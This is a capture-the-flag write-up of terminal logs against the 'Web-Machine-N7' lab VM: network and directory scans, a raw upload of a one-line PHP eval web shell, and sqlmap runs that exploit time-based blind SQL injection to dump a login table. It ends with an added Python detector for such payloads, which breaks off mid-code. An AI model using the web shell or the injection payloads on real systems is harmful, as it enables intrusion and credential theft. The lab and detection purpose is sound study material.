Web-Machine-N7

$ sudo nmap -sP 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00048s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.18s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.19s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.18s latency).
MAC Address: 2A:86:BB:96:BD:6C (Unknown)
Nmap scan report for 192.168.0.107
Host is up (0.00013s latency).
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00066s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.93 seconds
$ sudo nmap -sV -sC -A 192.168.0.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:32 CST
Nmap scan report for 192.168.0.107
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.46 (Debian)
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.0.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds
$ ./dirsearch.py -u 192.168.0.107

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11305

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-21_04-45-34.txt

Target: http://192.168.0.107/

[04:45:34] Starting: 
[04:45:35] 403 -  278B  - /.ht_wsr.txt
[04:45:35] 403 -  278B  - /.htaccess.bak1
[04:45:35] 403 -  278B  - /.htaccess.save
[04:45:35] 403 -  278B  - /.htaccess.sample
[04:45:35] 403 -  278B  - /.htaccess.orig
[04:45:35] 403 -  278B  - /.htaccessBAK
[04:45:35] 403 -  278B  - /.htaccessOLD
[04:45:35] 403 -  278B  - /.htaccessOLD2
[04:45:35] 403 -  278B  - /.htaccess_extra
[04:45:35] 403 -  278B  - /.htaccess_orig
[04:45:35] 403 -  278B  - /.htaccess_sc
[04:45:35] 403 -  278B  - /.htm
[04:45:35] 403 -  278B  - /.html
[04:45:35] 403 -  278B  - /.htpasswd_test
[04:45:35] 403 -  278B  - /.htpasswds
[04:45:35] 403 -  278B  - /.httr-oauth
[04:45:36] 403 -  278B  - /.php
[04:45:47] 200 -    2KB - /index.html
[04:45:48] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[04:45:53] 200 -    1KB - /profile.php
[04:45:54] 403 -  278B  - /server-status
[04:45:54] 403 -  278B  - /server-status/

Task Completed

$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -f .html --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 1323275

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-20_21-10-10.txt

Target: http://192.168.0.107/

[21:10:10] Starting: 
[21:10:10] 200 -    2KB - //
[21:10:10] 200 -    1KB - /profile.php
[21:10:11] 200 -    2KB - /index.html
[21:10:18] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[21:11:03] 200 -  279B  - /exploit.html
POST /profile.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------390266645724629296494056176300
Content-Length: 258
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/exploit.html
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------390266645724629296494056176300
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/x-php

<?php @eval($_POST['hacker']); ?>

-----------------------------390266645724629296494056176300--
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbs --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:49 /2022-03-20/

[21:57:49] [INFO] testing connection to the target URL
[21:57:49] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[21:57:55] [INFO] resuming back-end DBMS 'mysql' 
[21:57:55] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...8rdGVZNWxv'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pass (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jLFz&pass=' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))tzDH) AND 'UBOy'='UBOy&sub=SEND

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jLFz' AND (SELECT 6782 FROM (SELECT(SLEEP(5)))iLpP) AND 'hhga'='hhga&pass=&sub=SEND
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: user, type: Single quoted string (default)
[1] place: POST, parameter: pass, type: Single quoted string
[q] Quit
> 0
y
[21:58:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:58:07] [INFO] fetching current database
[21:58:07] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[21:58:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[21:58:31] [INFO] adjusting time delay to 1 second due to good response times
Machine
current database: 'Machine'
[21:58:54] [INFO] fetching database names
[21:58:54] [INFO] fetching number of databases
[21:58:54] [INFO] resumed: 4
[21:58:54] [INFO] resumed: information_schema
[21:58:54] [INFO] resumed: Machine
[21:58:54] [INFO] resumed: mysql
[21:58:54] [INFO] resuming partial value: performa
[21:58:54] [INFO] retrieved: nce_schema
available databases [4]:
[*] information_schema
[*] Machine
[*] mysql
[*] performance_schema

[21:59:38] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv'

[*] ending @ 21:59:38 /2022-03-20/
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:02:31 /2022-03-20/

[22:02:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:02:31] [INFO] testing connection to the target URL
[22:02:31] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:02:32] [INFO] flushing session file
[22:02:32] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...NkS2x1VEVn'). Do you want to use those [Y/n] Y
[22:02:32] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:02:32] [INFO] testing if the target URL content is stable
[22:02:32] [INFO] target URL content is stable
[22:02:32] [INFO] testing if POST parameter 'user' is dynamic
[22:02:32] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:02:33] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:02:33] [INFO] testing for SQL injection on POST parameter 'user'
[22:02:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:02:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:02:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:02:35] [INFO] testing 'Generic inline queries'
[22:02:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:02:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:02:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:02:48] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:02:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:02:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:02:51] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=KHfL' AND (SELECT 9320 FROM (SELECT(SLEEP(5)))HGJG) AND 'eYED'='eYED&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:03:07] [INFO] the back-end DBMS is MySQL
[22:03:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:03:12] [INFO] fetching tables for database: 'Machine'
[22:03:12] [INFO] fetching number of tables for database 'Machine'
[22:03:12] [INFO] retrieved: 1
[22:03:19] [INFO] retrieved: 
[22:03:24] [INFO] adjusting time delay to 1 second due to good response times
login
Database: Machine
[1 table]
+-------+
| login |
+-------+

[22:03:47] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv'

[*] ending @ 22:03:47 /2022-03-20/
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T login --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:04:22 /2022-03-20/

[22:04:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.33 (KHTML, like Gecko) Ubuntu/9.10 Chromium/13.0.752.0 Chrome/13.0.752.0 Safari/534.33' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:04:22] [INFO] testing connection to the target URL
[22:04:22] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:04:23] [INFO] flushing session file
[22:04:23] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...N3a25oT0xz'). Do you want to use those [Y/n] Y
[22:04:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:04:23] [INFO] testing if the target URL content is stable
[22:04:23] [INFO] target URL content is stable
[22:04:23] [INFO] testing if POST parameter 'user' is dynamic
[22:04:23] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:04:24] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:04:24] [INFO] testing for SQL injection on POST parameter 'user'
[22:04:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:04:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:04:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:04:26] [INFO] testing 'Generic inline queries'
[22:04:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:04:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:04:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:04:39] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:04:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:04:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:04:42] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=UyDc' AND (SELECT 1506 FROM (SELECT(SLEEP(5)))RzSr) AND 'CyXL'='CyXL&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:04:58] [INFO] the back-end DBMS is MySQL
[22:04:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:05:04] [INFO] fetching tables for database: 'Machine'
[22:05:04] [INFO] fetching number of tables for database 'Machine'
[22:05:04] [INFO] retrieved: 1
[22:05:10] [INFO] retrieved: 
[22:05:15] [INFO] adjusting time delay to 1 second due to good response times
logi^C
[22:05:35] [WARNING] user aborted in multiple target mode
do you want to skip to the next target in list? [Y/n/q] Y
[22:05:35] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv'

[*] ending @ 22:05:35 /2022-03-20/
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T "login" --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:05:48 /2022-03-20/

[22:05:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Firefox/1.0.4' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:05:48] [INFO] testing connection to the target URL
[22:05:48] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:05:48] [INFO] flushing session file
[22:05:48] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...hINklKVitV'). Do you want to use those [Y/n] Y
[22:05:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:05:48] [INFO] testing if the target URL content is stable
[22:05:49] [INFO] target URL content is stable
[22:05:49] [INFO] testing if POST parameter 'user' is dynamic
[22:05:49] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:05:49] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:05:49] [INFO] testing for SQL injection on POST parameter 'user'
[22:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:05:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:05:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:05:52] [INFO] testing 'Generic inline queries'
[22:05:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:05:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:05:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:06:04] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:06:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:06:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:06:08] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=kPuP' AND (SELECT 7577 FROM (SELECT(SLEEP(5)))rlbg) AND 'nKIr'='nKIr&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:06:24] [INFO] the back-end DBMS is MySQL
[22:06:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:06:29] [INFO] fetching columns for table 'login' in database 'Machine'
[22:06:29] [INFO] retrieved: 
[22:06:39] [INFO] adjusting time delay to 1 second due to good response times
3
[22:06:41] [INFO] retrieved: username
[22:07:13] [INFO] retrieved: varchar(20)
[22:08:00] [INFO] retrieved: password
[22:08:36] [INFO] retrieved: varchar(50)
[22:09:23] [INFO] retrieved: role
[22:09:43] [INFO] retrieved: varchar(20)
Database: Machine
Table: login
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
| role     | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[22:10:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv'

[*] ending @ 22:10:30 /2022-03-20/
$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T "login" -C "password,role,username" --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.3#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:11:12 /2022-03-20/

[22:11:12] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.3 Firefox/1.5.0.6' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:11:12] [INFO] testing connection to the target URL
[22:11:12] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:11:13] [INFO] flushing session file
[22:11:13] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...Z6Wi9pbDU4'). Do you want to use those [Y/n] Y
[22:11:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:11:13] [INFO] testing if the target URL content is stable
[22:11:13] [INFO] target URL content is stable
[22:11:13] [INFO] testing if POST parameter 'user' is dynamic
[22:11:13] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:11:14] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:11:14] [INFO] testing for SQL injection on POST parameter 'user'
[22:11:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:11:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:11:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:11:16] [INFO] testing 'Generic inline queries'
[22:11:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:17] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:11:29] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:11:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:11:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:11:32] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=ycLE' AND (SELECT 6755 FROM (SELECT(SLEEP(5)))aeWE) AND 'tLVd'='tLVd&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:11:48] [INFO] the back-end DBMS is MySQL
[22:11:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:11:53] [INFO] fetching entries of column(s) 'password,role,username' for table 'login' in database 'Machine'
[22:11:53] [INFO] fetching number of column(s) 'password,role,username' entries for table 'login' in database 'Machine'
[22:11:53] [INFO] retrieved: 1
[22:12:00] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[22:12:09] [INFO] adjusting time delay to 1 second due to good response times
FLAG{N7:KSA_01}
[22:13:20] [INFO] retrieved: admin
[22:13:41] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+-----------------+-------+---------------+
| password        | role  | username      |
+-----------------+-------+---------------+
| FLAG{N7:KSA_01} | admin | administrator |
+-----------------+-------+---------------+

[22:14:34] [INFO] table 'Machine.login' dumped to CSV file '/home/joker/.local/share/sqlmap/output/192.168.0.107/dump/Machine/login.csv'
[22:14:34] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv'

[*] ending @ 22:14:34 /2022-03-20/
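Two things in the sessions above are worth catching on the server side rather than after the fact: the time-based blind injection in the `user` field of `/enter_network/` (a `SLEEP(5)` payload, corroborated by a response that takes about five seconds) and the multipart upload of a `.php` file to `/profile.php`. The script below is an added example, not part of the original writeup: it runs two detection rules over request records and confirms a suspected time-based payload against the observed response time. It assumes requests have already been parsed into dicts with `method`, `path`, `content_type`, `body` and `duration_ms` (the field names and the sample records are constructed here, modelled on the requests shown above).

```python
"""Detect time-based blind SQLi and PHP uploads in web request records.

Added example; the record format (method/path/content_type/body/duration_ms)
is an assumption, and the sample records below are constructed to mirror the
requests seen in the writeup.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlencode

# Delay functions used by time-based blind injection across common DBMSs.
TIME_DELAY_FN = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\s*\(", re.I)
SLEEP_SECONDS = re.compile(r"\bSLEEP\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Multipart part names/bodies that indicate server-side script upload.
PHP_FILENAME = re.compile(r'filename="[^"]*\.(?:php\d?|phtml|phar)"', re.I)
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


@dataclass
class Finding:
    rule: str
    path: str
    detail: str
    confirmed: bool = False  # for SQLi: response time matched the requested delay


def extract_sleep_seconds(value: str) -> Optional[float]:
    """Return the delay requested by a SLEEP(n) call in a field value, if any."""
    m = SLEEP_SECONDS.search(value)
    return float(m.group(1)) if m else None


def check_sqli(req: Dict) -> List[Finding]:
    """Flag URL-encoded form fields carrying a DBMS delay function.

    A payload is marked confirmed when the server took at least as long to
    answer as the payload asked it to sleep, which is the signal sqlmap itself
    relies on for time-based blind injection.
    """
    if not req["content_type"].startswith("application/x-www-form-urlencoded"):
        return []
    out = []
    for field, values in parse_qs(req["body"], keep_blank_values=True).items():
        for value in values:
            if not TIME_DELAY_FN.search(value):
                continue
            secs = extract_sleep_seconds(value)
            confirmed = secs is not None and req["duration_ms"] >= secs * 1000
            out.append(Finding("time-based-sqli", req["path"],
                               f"field {field!r} requests {secs}s delay", confirmed))
    return out


def check_php_upload(req: Dict) -> List[Finding]:
    """Flag multipart uploads whose filename or content is PHP.

    Regex over the raw body is enough for a log-side check; an application
    would inspect the parsed part instead and reject on either signal.
    """
    if not req["content_type"].startswith("multipart/form-data"):
        return []
    out = []
    if PHP_FILENAME.search(req["body"]):
        out.append(Finding("php-upload-filename", req["path"], "PHP extension in filename"))
    if PHP_OPEN_TAG.search(req["body"]):
        out.append(Finding("php-upload-content", req["path"], "PHP open tag in uploaded content"))
    return out


def scan(requests: List[Dict]) -> List[Finding]:
    findings = []
    for req in requests:
        findings += check_sqli(req)
        findings += check_php_upload(req)
    return findings


# Constructed sample records (assumed format), modelled on the writeup's requests.
FORM = "application/x-www-form-urlencoded"
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/enter_network/", "content_type": FORM, "duration_ms": 5210,
     "body": urlencode({"user": "jLFz' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))tzDH) AND 'UBOy'='UBOy",
                        "pass": "", "sub": "SEND"})},
    {"method": "POST", "path": "/enter_network/", "content_type": FORM, "duration_ms": 41,
     "body": urlencode({"user": "alice", "pass": "hunter2", "sub": "SEND"})},
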